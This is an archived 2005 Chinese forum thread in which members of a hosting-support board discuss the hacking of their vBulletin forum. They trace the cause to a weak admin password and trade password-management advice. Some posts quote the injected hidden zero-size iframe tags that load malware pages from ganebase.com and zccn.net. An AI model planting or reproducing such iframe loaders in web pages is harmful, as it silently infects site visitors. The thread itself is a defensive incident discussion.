PDA

查看完整版本 : [有木馬]哈啦大大...


vincentliao
2005-05-12, 10:33 PM
<iframe src="http://www.ganebase.com/temp/hinet.htm" width=0 height=0 frameborder=0></iframe>

steven
2005-05-12, 10:46 PM
這這這.....................
這麼快又中了......

ckmarkhsu
2005-05-12, 10:47 PM
恩 非常好.....看來真的不是phpBB的問題...

ckmarkhsu
2005-05-12, 10:50 PM
已經移除...

真是沒面子...

另外..對於之前批評phpBB安全性問題...向phpBB的支持者道歉Orz

some
2005-05-12, 10:56 PM
謎之音: 絕對是使用者的問題.. 絕對是.... :)

licheng
2005-05-12, 11:10 PM
已經移除...
真是沒面子...
這怎麼會沒面子?

沒有絕對安全的論壇,也沒有絕對安全的作業系統。只有細心負責的系統維護者。

剛剛才看見有人反應,一回頭,已經移除了。

夠快。 ~yes

seesawgame
2005-05-12, 11:15 PM
這個東東會植入在xoops裡面嗎?

Ricado
2005-05-12, 11:16 PM
沒有絕對安全的論壇,也沒有絕對安全的作業系統。只有細心負責的系統維護者。


~youarebe:

網路線拔掉可能更安全,否則就要有隨時被攻擊的準備。

ckmarkhsu
2005-05-13, 12:53 AM
恩 我已經寫信給Acsite討論問題的可能性

剛剛再竹貓也有發現有人有相同問題 不過他是phpBB2.0.14

埃......

哈啦
2005-05-13, 01:00 AM
真是不好意思,我自己怎麼來來去去都沒有接到任何顯示警告呢?我現在是用卡巴斯基啊?

還好有徐同學ckmarkhsu的支援,不然我也不知該怎麼辦?
這些木馬到底是怎麼植入的?

ckmarkhsu
2005-05-13, 01:10 AM
真是不好意思,我自己怎麼來來去去都沒有接到任何顯示警告呢?我現在是用卡巴斯基啊?

還好有徐同學ckmarkhsu的支援,不然我也不知該怎麼辦?
這些木馬到底是怎麼植入的?
恩 我必須要很誠實的說...

我道維太淺...真的不知道是怎樣被植入的Orz


哈拉大大太客氣了

我沒把您的論壇搞好學弟真是羞愧阿Orz...

some
2005-05-13, 02:06 AM
可不可以先裝 那個白色的 樣版阿.. ?:teeth

adam
2005-05-13, 07:21 AM
<iframe src="http://www.ganebase.com/temp/hinet.htm" width=0 height=0 frameborder=0></iframe>

請問您有在ie開啟網頁的原始檔嗎? 這串文字是放在那啊? ~what

coca
2005-05-13, 08:46 AM
哈拉兄,建議你將所有的ADMIN密碼全數更換,包含SQL的,然後找看看
有沒有跑其他的小程式。我換了VBB目前還沒中獎..@@

heybye
2005-05-13, 09:23 AM
我的BBS已经感染过4次了。
这应当是一个Upload漏洞,利用上传扩展名为.jpg的病毒文件进行感染。

licheng
2005-05-13, 02:45 PM
請問您有在ie開啟網頁的原始檔嗎? 這串文字是放在那啊? ~what
應該是已經移除掉了。

當初 vincentliao 發文的時候,我有看了一下網頁原始碼,是有那些東西。

當時的瀏覽器是 Mozilla Firefox 1.0.4 英文版。

ckmarkhsu
2005-05-13, 03:55 PM
應該是已經移除掉了。

當初 vincentliao 發文的時候,我有看了一下網頁原始碼,是有那些東西。

當時的瀏覽器是 Mozilla Firefox 1.0.4 英文版。
恩 我移除掉的

總不能依直放著吧~"~

kiang
2005-05-13, 04:08 PM
如果問題是出在同一台主機的其他帳號,那就真的沒輒了...

vincentliao
2005-05-13, 07:24 PM
講出來大家可能打死不相信.
小弟電腦單純到連[防毒]/[Office]/[FTP]這些軟體都沒有.

記得好久以前的幾位電腦師父
[劉X淦]/[涂x誠]
他們教小弟的一些方法如何當管理系統者.
小弟受益良多.
提出來大家當一下參考.

a.把環境處理到最簡單的狀況,這樣您才可以抓到最難的問題.
b.絕對不用電子方式留下系統者的帳號與密碼.這些只能用當面與電話告知.
c.當有異樣發生時,一定要查出來,不然以後會更複雜.

PS1.: 小弟是看ADSL的訊號禿然亂閃,到[cntl]+[Alt]+[Del]多了一個job.
才查到有[木馬] ...
PS2.: [2005-05-12,22:33] ==) [2005-05-12,22:50]這段時間在首頁的使用者,您的 IE 已經被攻擊了,有可能已經種[木馬]了...

vincentliao
2005-05-13, 07:38 PM
XP 預設就是用 IE.
自行線上掃一下毒了,因為小弟也中標了.

http://googol.name/index.php?showtopic=203
http://vbb3.twftp.org/showthread.php?t=5881

dx2
2005-05-13, 07:56 PM
管理者不應該拿管理其他server的電腦來上網,尤其是四處亂逛甚至瘋狂下載的。

vincentliao
2005-05-13, 08:09 PM
小弟直話直說了...

Phpbb
Vbb
都被破了.

這真的是系統管理者的問題.
1.密碼給誰.如何給法.
2.電腦的管理方法.
3.系統管理者,不只是您的電腦資料重要,
而是其他使用者都該告知,請他們趕快改密碼.

哈啦
2005-05-13, 08:56 PM
這個系統管理者是指主機商嗎?

choachukang
2005-05-13, 08:59 PM
bubble.com.tw
phpbb-tw.net
bbs.nova.com.tw
silon.loxa.edu.tw
antique.bubble.com.tw
都有被植入ganebase.com/temp/hinet.htm"

未註冊
2005-05-13, 09:04 PM
講出來大家可能打死不相信.
小弟電腦單純到連[防毒]/[Office]/[FTP]這些軟體都沒有哈,這兒就有一位同好啦。 :)

我這兒也是差不多。沒有防毒軟體,沒有 MS Office,系統預設的瀏覽器是 Mozilla Firefox,預設的電子郵件軟體是 Mozilla Mail。

作業系統是 Windows NT 4.0 workstation。安全防護方面,就是防火牆,以及良好的使用習慣。

前陣子 dx2 推薦一款掃木馬的軟體 Spybot,目前都保持最新的資料,也從未掃出過任何一個木馬。希望 Spybot 可以信賴。 :P

a.把環境處理到最簡單的狀況,這樣您才可以抓到最難的問題.
b.絕對不用電子方式留下系統者的帳號與密碼.這些只能用當面與電話告知.
c.當有異樣發生時,一定要查出來,不然以後會更複雜.正確。

剛剛才幫一位朋友架設一個網站,設定完成後,要將相關密碼告訴對方。我希望直接以電話告知•不過,我設的密碼,又臭又長。搞半天,對方堅持直接以電子郵件寄給他。

奈何。

哈啦
2005-05-13, 09:04 PM
又中了現在?誰在搞鬼?

choachukang
2005-05-13, 09:07 PM
<iframe src="http://gamania.go.zccn.net/x/hinet.htm

還有這個!

some
2005-05-13, 09:08 PM
如果是目錄又被砍了, 換了 html 鐵定是主機商的問題..

但是這種 SQL 注入攻擊, 網路有教學文章..

直接用<FORM> 和 </FORM> 之間的變數就可以注入了

http://www.securiteam.com/securityreviews/5DP0N1P76E.html


要怎麼防? 不知道是不是 php 版本的關係還是?

licheng
2005-05-13, 09:08 PM
咦?又變成訪客了? ~what

哈啦
2005-05-13, 09:09 PM
這次是放在網站名稱那欄,我已把它刪了。
請問這到底是如何做到的?而且就在剛才一分鐘內的事,因為之前我正在發文章,一發完就發現又出現了。我能立即找到人嗎?

some
2005-05-13, 09:15 PM
如果可以的話請回報官方比較快~

哈啦
2005-05-13, 09:17 PM
如果可以的話請回報官方比較快~


什麼意思?誰是官方? ~what

some
2005-05-13, 09:26 PM
原始的的sql 檔案沒辦法用一般編輯器讀取..

這是常見的 SQL Injection Walkthrough 的問題, 用表單直接注入到 SQL

所以回報 VBB 官方請提供修正檔可能是最快的方法...

也有可能是主機的問題 ( php版本等等.. )

哈拉大哥要不要把 快速回覆這個輸入表單關掉一段時間看看.

ckmarkhsu
2005-05-13, 09:39 PM
恩 我今晚就會到官方論壇去反應

另外ACSITE回我的信了 他說上一封信沒收到 他們正在檢查問題

晚點會給我答覆

硍 那個GB惹毛我了

我一定要找到問題根源一 一|||


不過我不解的是 為什麼網路上六十幾萬個VBB論壇 偏偏就我上的這幾個被INJECT@@

TWFTP好像還沒遭殃@@....


我自己的學生論壇還在用vB2.3也沒事情@@


哈拉要不要幫我寫英文反應意見阿@@

我英文寫作頗濫@@

ckmarkhsu
2005-05-13, 09:49 PM
另外有個問題 哈啦的密碼太簡單了...

我已經建議他改密碼.....

四位數的數字一 一|||

some
2005-05-13, 09:52 PM
另外有個問題 哈啦的密碼太簡單了...

我已經建議他改密碼.....

四位數的數字一 一|||

~embarass: 我也是..

不過除了論壇以外都是13~15位的密碼 ~coolguy

ckmarkhsu
2005-05-13, 09:53 PM
是我電腦的問題嗎

為什麼竹貓連不上去?

licheng
2005-05-13, 09:58 PM
另外有個問題 哈啦的密碼太簡單了...
四位數的數字不會吧?

這... 太酷了。 :bow

我有一套密碼管理方式。

所有密碼都是亂數產生,字數從 12 到 20 個字元,都有可能。而且沒有兩個地方的密碼是相同的。 ~embarass:

真正重要的密碼,則是使用 GnuPG 加密。 ~coolguy

licheng
2005-05-13, 10:01 PM
為什麼竹貓連不上去?我也連不上。 :roll:

德不孤,必有鄰。 ?:teeth

teddychu
2005-05-13, 10:08 PM
不會吧?

這... 太酷了。 :bow

我有一套密碼管理方式。

所有密碼都是亂數產生,字數從 12 到 20 個字元,都有可能。而且沒有兩個地方的密碼是相同的。 ~embarass:

真正重要的密碼,則是使用 GnuPG 加密。 ~coolguy
可以跟您請教一下大致上是怎樣運作的嗎?
(這麼多密碼,這麼長,打起來不是很累?)

謝謝。 ~yes

哈啦
2005-05-13, 10:20 PM
不過我不解的是 為什麼網路上六十幾萬個VBB論壇 偏偏就我上的這幾個被INJECT@@

TWFTP好像還沒遭殃@@....


我自己的學生論壇還在用vB2.3也沒事情@@


哈拉要不要幫我寫英文反應意見阿@@

我英文寫作頗濫@@

會不會是常上本站的訪客幹的?所以感覺上會有一個相關的範圍?

你要表達什麼寫個中文,我看能否寫成英文?不然就麻煩DTC版友,他是在美國學電腦的,絕對沒問題 ?:teeth

licheng
2005-05-13, 10:32 PM
可以跟您請教一下大致上是怎樣運作的嗎?簡單講,就是以一個複雜但是自己記得住的密碼,管理其他所有的密碼。

自己只要記住那個唯一的複雜的密碼即可。其他的密碼,以該密碼保護。

密碼分門別類,儲存在不同的文字檔裡頭,然後以 RAR 壓縮。需要使用密碼的時候,開啟 WinRAR,調出需要的密碼,然後複製拷貝,就成了。

這種方式,不要說 20 個字元,64 個字元也沒問題。

不過,因為有些網站,最多只能輸入 20 個字元,所以,以 20 個字元為上限。

而這個單一密碼保護的檔案,當然是命根子。平時的備份,就很重要。

備份時,除了光碟備份,磁片備份,以及網路遠端備份之外,備份之前,還以 GnuPG 加密。GnuPG 的加密密碼,採用中文。算了一下,我的中文密碼,長達 28 個字元。

GnuPG 支援任意字碼,包括空白以及斷行字元。

細節當然還有地方要注意,但是,原則大致是如此。

ckmarkhsu
2005-05-14, 01:03 AM
我想我已經知道那個該死的人是怎麼稿的了:)

一切的問題 出自於哈啦的密碼太簡單了

他是直接從後台修改 植入iframe

根本不是什麼漏洞一 一|||

等等打LOG檔PO上來

我還需要一點時間分析:)

some
2005-05-14, 01:22 AM
.......

謎之聲: 這一定是使用者的問題.. 一定是..

ckmarkhsu
2005-05-14, 01:25 AM
~"~

some老大

Apache的LOG紀錄的真的很清楚嗎@@

我沒有亂掰啦XD

那個機掰的人 他是用哈拉站長的帳號登入

他還會查詢管理紀錄喔@@

可惜 這論壇的管理紀錄是我才有權限刪除 哈哈

所以他的行為都被紀錄下來了一 一|||

some
2005-05-14, 01:36 AM
嘿~ 我是開玩笑的啦 ^^"

哈啦
2005-05-14, 01:59 AM
~"~

some老大

Apache的LOG紀錄的真的很清楚嗎@@

我沒有亂掰啦XD

那個機掰的人 他是用哈拉站長的帳號登入

他還會查詢管理紀錄喔@@

可惜 這論壇的管理紀錄是我才有權限刪除 哈哈

所以他的行為都被紀錄下來了一 一|||

那麼說,這是有個特定的人針對這個論壇進入的嗎?那其他的論壇說有被駭的類似情形,也是他跑到那個論壇並且取得密碼後進入後台搞鬼的?而非先前猜的可能是利用機器人大量掃瞄所致?
還有,他怎麼會知道我在虛擬主機上的帳號名稱?
所以從訪客IP可以查知大概的方向?

是這樣嗎?

vincentliao
2005-05-14, 02:50 AM
哈拉大大,Ckmarkhsu大大,

請把資料收集好,可以找[刑事組]幫忙了.

ckmarkhsu
2005-05-14, 03:36 AM
分析結果:)

http://www.domain.club.tw/showthread.php?t=5852

哈啦
2005-05-14, 03:39 AM
我個人的保密措施太過馬虎而造成此次及過去的類似事件,實在十分抱歉。 ~embarass: :bow

adam
2005-05-14, 07:38 AM
請問是什麼的密碼 ~what

我們有一位用戶的ASP論壇在二月前也是有類似情況, 字串寫入論壇的分版敘述文字中,
也就是存入ACCESS資料庫中......

WIN和LINUX平台不一樣, PHP程式和ASP程式也不一樣, 資料庫類型也不一樣....
目前想到的, 就是在論壇上面能夠輸入資料的欄位輸入特定字串 :hitwall

ckmarkhsu
2005-05-14, 08:17 AM
就是帳號密碼阿@@....

未註冊
2005-05-14, 08:33 AM
那之前的PHPBB2被入侵, 也是一樣是密碼的原因嗎?
那不是很多論壇站長都太笨了

未註冊
2005-05-14, 08:33 AM
怎麼又自動登出了

ckmarkhsu
2005-05-14, 08:41 AM
痾 我可沒有這麼說@@

我僅是針對此次問題分析LOG得到的結論

其他我還要看他們的LOG才能做判斷@@

vincentliao
2005-05-14, 01:48 PM
哈拉的損失應該還好,
而小弟以前的損失是用百萬計.
照log看,這次只是小朋友,還非正規的大陸駭客部隊.
辛苦了,由其是哈拉大大與Ckmarkhsu大大.
小弟謹致上十二萬分的祝福.

哈啦
2005-05-14, 02:00 PM
哈拉的損失應該還好,
而小弟以前的損失是用百萬計.
照log看,這次只是小朋友,還非正規的大陸駭客部隊.
辛苦了,由其是哈拉大大與Ckmarkhsu大大.
小弟謹致上十二萬分的祝福.


這還得感謝徐同學,我是吃飽閑閑,根本混然不覺 ~embarass:

whosee
2005-05-14, 02:00 PM
哈拉的損失應該還好,
而小弟以前的損失是用百萬計.
照log看,這次只是小朋友,還非正規的大陸駭客部隊.
辛苦了,由其是哈拉大大與Ckmarkhsu大大.
小弟謹致上十二萬分的祝福.

呵呵...
典型的受「政治」迫害...
應該要求國家賠償...

adam
2005-05-14, 04:11 PM
這還得感謝徐同學,我是吃飽閑閑,根本混然不覺 ~embarass:
還好不是哈拉的網路銀行帳號與密碼
不然 ~coolguy

vincentliao
2005-05-14, 06:20 PM
TWFTP.org 中木馬...
http://www.googol.name/open_doc/twftp/
這些人真無聊...

Jerry.L
2005-05-14, 06:25 PM
是被入侵了吧..
討論區標題先被改成
1.中国。台灣FTP聯盟 然後又被改成
2.不得不回来 接著又被改
3.ckmarkhsu,I'm back

vincentliao
2005-05-14, 06:30 PM
Yes
小弟的發言也被砍了...
還好有留影...

vincentliao
2005-05-14, 06:38 PM
入侵手法
Step1: 先進 Ckmarkhsu 的頭像植入木馬code
Step2: 再進首頁, 植入 木馬code

vincentliao
2005-05-14, 06:44 PM
可能今天選舉...
只要叫 _[台灣]_ 的論壇都招惹到大陸...

ckmarkhsu
2005-05-14, 10:50 PM
恩 我關閉了論壇大部分的進階功能

我想我可能招惹到他了


必要時我會消失...

希望不要造成兩個論壇的困擾

當然 我還是會繼續提供協助....

sorry

vincentliao
2005-05-15, 12:26 AM
1.作好您該做的事...
2.一個無法再吸收新知的廢人,多說無益...
3.乞丐趕廟公,天下沒有這種道理...
4.總統府的網頁還好好的... http://www.president.gov.tw/
5.美國白宮還在耶... http://whitehouse.gov
6.小弟網站還沒掛... http://googol.name

:)

monkey
2005-05-15, 12:11 PM
這幾天因為電腦耍脾氣..不給我用 >"<
沒想到這裡發生了 大 事 !
ckmarkhsu 辛苦了!

some
2005-05-15, 02:23 PM
twftp.org 幾乎每個版面都有木馬 ^^"

vincentliao
2005-05-15, 03:06 PM
這些_[蒙面人]_ 在玩[貓抓耗子遊戲]...

沒能力去破
總統府 http://www.president.gov.tw/
白宮 http://whitehouse.gov/

這些_[蒙面人]_ 只會在這邊耍猴戲...
版上大大只能在這邊猜...
良性建議半天...
方向都在繞圈子...

只有LOG會說話...
作好備份最重要...

大家能幫的有限...
最後哈啦要自己作判斷...

dx2
2005-05-15, 10:58 PM
洞補起來了,請小心下一個洞。

vincentliao
2005-05-16, 12:25 AM
辛苦了 Dx2大大.

不知道有哪為大大有分析過被植入的 Code 為何?
a. 只是要偷別人的密碼?
b. 當作DDOS的跳板...
還是有其他功能...

harry112
2005-05-16, 03:31 PM
簡單講,就是以一個複雜但是自己記得住的密碼,管理其他所有的密碼。

請問這隻程式的名稱是?

licheng
2005-05-16, 04:05 PM
請問這隻程式的名稱是?什麼程式都可以。只要可以壓縮,將帶有密碼的檔案集中管理,以及提供加密的功能,保護所有密碼檔,基本上,什麼程式都行。

我是使用 WinRAR。

不是說 WinRAR 最好,而是,它在方便性跟安全性之間,提供了一個平衡點。

我們要安全,也要某種程度的方便。不然,還沒防得了小人,先整死君子。 :that is :

真正要安全的話,我是建議通通使用 GnuPG。但是,GnuPG 在 Windows 的環境底下,使用不太方便。WinRAR 雖然安全性不若 GnuPG,但是,使用方便。而且普遍性不亞於 GnuPG,可以在 Windows, Linux, BSD 底下通用。

WinRAR 從 DOS 時代到現在,破解密碼除了暴力破解,還沒有其他捷徑。就個人使用的標準,算是安全。

而 WinZip 則要避免。WinZip 的密碼,太容易破解。幾乎不需要五六秒,再長的密碼,都可以輕易破解。雖然說新版的 WinZip 有改善,但是,WinZip 不良記錄太多了,少碰為妙。

這是平常使用。如果要備份到光碟、磁片,特別是遠端備份,為了安全起見,除了 WinRAR,最好還要以 GnuPG 加密。因為,檔案落入他人手中,就可以慢慢破解,什麼時候被破解掉了都不知道。

當然還有其他注意事項,譬如檔案隱藏什麼的,反正,務必小心。

ismile
2005-05-16, 11:39 PM
請問有什麼好用的 GnuPG 程式可在 Windows 下用嗎 ?

Jerry.L
2005-05-17, 07:33 AM
請問有什麼好用的 GnuPG 程式可在 Windows 下用嗎 ?

GnuPG 1.4.1
ftp://ftp.gnupg.org/gcrypt/binary/gnupg-w32cli-1.4.1.exe

licheng
2005-05-17, 07:38 AM
請問有什麼好用的 GnuPG 程式可在 Windows 下用嗎 ?好用的?嗯,看不太懂。

GnuPG 只有一種,在 Windows 底下的,也只有一種。

目前最新版是 1.4.1。

http://www.gnupg.org/

GnuPG 的操作方式是指令模式,沒有 GUI。當然,有人開發搭配 GnuPG 的 GUI 程式,不過,我沒用過。我還是習慣指令模式的操作。

相關的資料或資源,在 GnuPG 網站都可以找到。

Jerry.L
2005-05-17, 07:46 AM
GnuPG 只有一種,在 Windows 底下的,也只有一種。


不只一種吧?!

GnuPG 有多版本,包含 Windows、DOS、Linux....

licheng
2005-05-17, 09:30 AM
哈,沒想到引起這樣的誤解。 ~greenlau:

我的意思是,GnuPG 只有一種樣子﹝look and feel﹞,不像 RAR,有 command line 的,也有 GUI 的。

除了 Windows 之外,GnuPG 我都是自己編譯的。因為都是同一個原始程式碼編譯,在我眼中,他們自然都是屬於同一種了。 ~greenlau:

也在 cygwin 環境底下,以及使用 Mingw32 編譯 GnuPG。是可以執行啦,不過,有些功能在 Windows 底下沒作用,編譯時需要注意的地方蠻多的,不如直接抓 Windows 版編譯好的執行檔。

話又說回來,這一次是運氣好,GnuPG 1.4.1 有編譯好的 Windows 執行檔。前幾個版本,GnuPG 網站只教人怎麼編譯,不提供執行檔下載。

真在乎安全隱私,需要依賴 GnuPG,要嘛換跑道,改用 Linux/BSD,要嘛設法學習怎麼自行編譯 GnuPG。或許 GnuPG 1.4.2,又要自力救濟了,也說不定。

不然就改用 PGP。

我從 PGP 2.6.2 開始使用 PGP。那是 DOS 時代的事。用到 PGP 6.5.8,之後,改用 GnuPG。還是 GnuPG 比較好。不過,在 Windows 環境的介面上,PGP 要好很多。有興趣的,也可以考慮 PGP。只是,我離開 PGP 太久了,不清楚它的現狀。

未註冊
2005-05-17, 12:33 PM
辛苦了 Dx2大大.

不知道有哪為大大有分析過被植入的 Code 為何?
a. 只是要偷別人的密碼?
b. 當作DDOS的跳板...
還是有其他功能...
V大,您錯愛了,我只出嘴巴而已。
被執入的code可能要找當事人才能看有沒有不小心留下來。